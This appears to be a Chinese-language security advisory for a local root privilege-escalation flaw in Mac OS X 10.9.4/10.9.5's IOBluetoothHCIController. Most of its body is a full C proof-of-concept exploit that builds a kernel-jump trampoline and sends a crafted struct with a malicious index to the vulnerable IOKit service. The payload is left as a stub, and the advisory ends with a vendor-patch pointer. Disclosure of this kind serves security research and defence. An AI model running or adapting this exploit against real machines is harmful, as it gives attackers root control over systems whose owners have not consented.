Apple Mac OS X IOBluetoothHCIController本地权限提升漏洞

BugTraq-ID:70894

发布日期：2014-10-22

更新日期：2014-11-07

受影响系统：

Apple Mac OS X 10.9.5

Apple Mac OS X 10.9.4

详细信息：

OS X（前称Mac OS X）是苹果公司为麦金塔电脑开发的专属操作系统的最新版本。 Apple Mac OS X 10.9.4及10.9.5版本在的IOBluetoothHCIController实现上存在本地权限提升漏洞，本地攻击者可利用此漏洞以root权限执行任意代码。 来源： Roberto Paleari （roberto.paleari@emaze.net） 测试方法： 警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！/* * pwn.c, by @rpaleari and @joystick * * This PoC exploits a missing sign check in * IOBluetoothHCIUserClient::SimpleDispatchWL(). * * Tested on Mac OS X Mavericks (10.9.4/10.9.5). * * Compile with: gcc -Wall -o pwn{,.c} -framework IOKit * */ #include <stdio.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> uint64_t payload() { /* Your payload goes here. */ } int main(void) { /* Map our landing page (kernel will jump at tgt+7) */ vm_address_t tgt = 0x0000048800000000; vm_allocate(mach_task_self(), &tgt, 0x1000, 0); vm_protect(mach_task_self(), tgt, 0x1000, 0, VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE); memset((void *)tgt, 0, 0x1000); /* Prepare payload */ char *target = (char *)tgt; /* mov rax, payload */ target[7] = 0x48; target[8] = 0xb8; *((uint64_t *)(&target[9])) = (uint64_t) payload; /* jmp rax */ target[17] = 0xff; target[18] = 0xe0; printf(" [+] Payload function @ %016llx\\n", (uint64_t) payload); printf(" [+] Stored trampoline @ %016llx\\n", (uint64_t) tgt+7); /* Find the vulnerable service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to the vulnerable service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\\n", port); /* The first 8 bytes must be 0, so we don\'t have to handle following parameters */ char a[] = "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" /* Don\'t really matter for the exploit (ignored due to the 0s above) */ "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x02\\x00\\x00\\x00\\x11\\x0a\\x00\\x00\\x03\\x72\\x00\\x00" "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\xfa\\x2a\\x54\\xff\\x7f\\x00\\x00\\x78\\x00\\x00\\x00" "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" "\\xa8\\xfb\\x2a\\x54\\xff\\x7f\\x00\\x00\\xd8\\xfa\\x2a\\x54\\xff\\x7f\\x00\\x00\\x60\\x4a\\xb6\\x86" "\\x80\\xff\\xff\\xff" /* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May need to be adjusted on other Mavericks versions. */ "\\xa8\\xb6\\xf5\\xff\\x80\\xff\\xff\\xff"; printf(" [+] Launching exploit!\\n"); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ /* Exec shell here after payload returns */ return IOServiceClose(port); }

解决办法：

厂商补丁：

Apple

-----

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.apple.com/support/downloads/